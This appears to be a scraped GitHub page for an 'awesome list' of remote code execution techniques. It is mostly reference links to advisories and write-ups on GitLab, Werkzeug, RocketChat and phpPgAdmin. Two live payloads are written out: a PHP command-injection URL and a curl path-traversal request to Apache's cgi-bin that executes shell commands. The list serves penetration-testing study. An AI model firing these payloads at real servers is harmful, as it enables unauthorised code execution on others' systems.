Awesome-RCE-techniques
Awesome-RCE-techniques copied to clipboard
p0dalirius
Awesome list of step by step techniques to achieve Remote Code Execution on various apps!
- https://about.gitlab.com/releases/2022/06/30/critical-security-release-gitlab-15-1-1-released/#remote-command-execution-via-project-imports - https://starlabs.sg/blog/2022/07-gitlab-project-import-rce-analysis-cve-2022-2185/
Add GitLab RCE via WikiCloth markdown rendering if the `rubyluabridge` gem is installed - https://gitlab.com/gitlab-org/gitlab/-/issues/345892 - https://hackerone.com/reports/1401444
## References - https://thinkloveshare.com/hacking/shells_with_jolokia_exploitation_toolkit/ - https://github.com/laluka/jolokia-exploitation-toolkit
## References - https://www.example.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E
Hi Podalirus👋 I would like to suggest another RCE technique for RocketChat, as presented in the following writeup, of HTB CTF DirtyMoney: https://cristi075.github.io/HTB-Business-CTF-2021-Rocket-writeup *N.B.*:https://www.exploit-db.com/exploits/49960 Cheers, Clem
If Werkzeug console is enabled rce is possible on host, sometimes the werkzeug is protecting by a PIN code that can be reconstructed. Ressources: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug https://github.com/wdahlenburg/werkzeug-debug-console-bypass
Adding rce technique on apache2, payload: `curl "http://url.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" --data 'echo Content-Type: text/plain; echo; mkdir /tmp/poda/'`
https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated) https://www.exploit-db.com/exploits/49736
Metadata
Owner
Metadata
Awesome list of step by step techniques to achieve Remote Code Execution on various apps!